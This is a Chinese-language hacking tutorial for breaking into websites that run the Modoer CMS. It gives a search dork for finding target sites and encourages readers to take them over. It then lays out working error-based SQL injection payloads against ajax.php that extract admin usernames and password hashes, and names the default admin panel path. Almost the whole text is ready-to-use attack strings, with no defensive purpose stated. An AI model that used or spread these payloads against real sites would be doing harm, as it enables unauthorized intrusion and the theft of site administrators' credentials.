关键字:intitle:Powered by Modoer intitle:游戏 可以根据需求自行拿站
测试漏洞:ajax.php?action=digg&idtype=shop&keyid=* FROM modoer_admin Where id=1 and substring((Select adminname FROM modoer_admin Where id=1),1,1)=0x61 %23
存在MySQL Query Error: Update modoer_shops 说明存在注入
接下来爆用户名
爆用户名:
ajax.php?action=digg&idtype=shop&keyid=1 and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,modoer_admin.adminname,0x27,0x7e) FROM `modo`.modoer_admin LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
FROM `modo`.modoer_admin LIMIT 0,1)在这里吧`modo`.替换为刚才跑出的库名 即为
ajax.php?action=digg&idtype=shop&keyid=1 and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,modoer_admin.adminname,0x27,0x7e) FROM `ytmodoer`.modoer_admin LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
用户名出来了 继续密码
密码:
ajax.php?action=digg&idtype=shop&keyid=1 and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,modoer_admin.password,0x27,0x7e) FROM `modo`.modoer_admin LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
跟以上方法一样 同样替换库名`modo`. 为跑出的库名
ajax.php?action=digg&idtype=shop&keyid=1 and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,modoer_admin.password,0x27,0x7e) FROM `ytmodoer`.modoer_admin LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
密码出来
在写这篇文章的同时 又看了下 也可以同时爆账号密码
ajax.php?action=digg&idtype=shop&keyid=1 and(select 1 from(select count(*),concat((select (select (Select concat(modoer_admin.password,0x3c,modoer_admin.adminname) FROM `ytmodoer`.modoer_admin LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
找到语句中的 这个 如果网站有两个或多个用户名或密码 我们可以把201 替换为202 可以同时爆出!
自行测试!
又一段代码 直接全爆 不用加库名 实践嘛 主要是给大家介绍下方法
[pre]
ajax.php?action=digg&idtype=shop&keyid=1 and(select 1 from(select count(*),concat((select (select (Select concat(modoer_admin.password,0x3c,modoer_admin.adminname) FROM modoer_admin LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
加这段代码 直接爆出账号密码 (后来才发现的)
下面就是后台
默认后台地址
Admincp.php
关键字:
intitle:Powered by Modoer intitle:游戏
测试漏洞:
ajax.php?action=digg&idtype=shop&keyid=* FROM modoer_admin Where id=1 and substring((Select adminname FROM modoer_admin Where id=1),1,1)=0x61%23
密码:
ajax.php?action=digg&idtype=shop&keyid=1 and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,modoer_admin.password,0x27,0x7e) FROM `modo`.modoer_admin LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
用户名:
ajax.php?action=digg&idtype=shop&keyid=1 and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,modoer_admin.adminname,0x27,0x7e) FROM `modo`.modoer_admin LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
同时爆账号密码
ajax.php?action=digg&idtype=shop&keyid=1 and(select 1 from(select count(*),concat((select (select (Select concat(modoer_admin.password,0x3c,modoer_admin.adminname) FROM modoer_admin LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1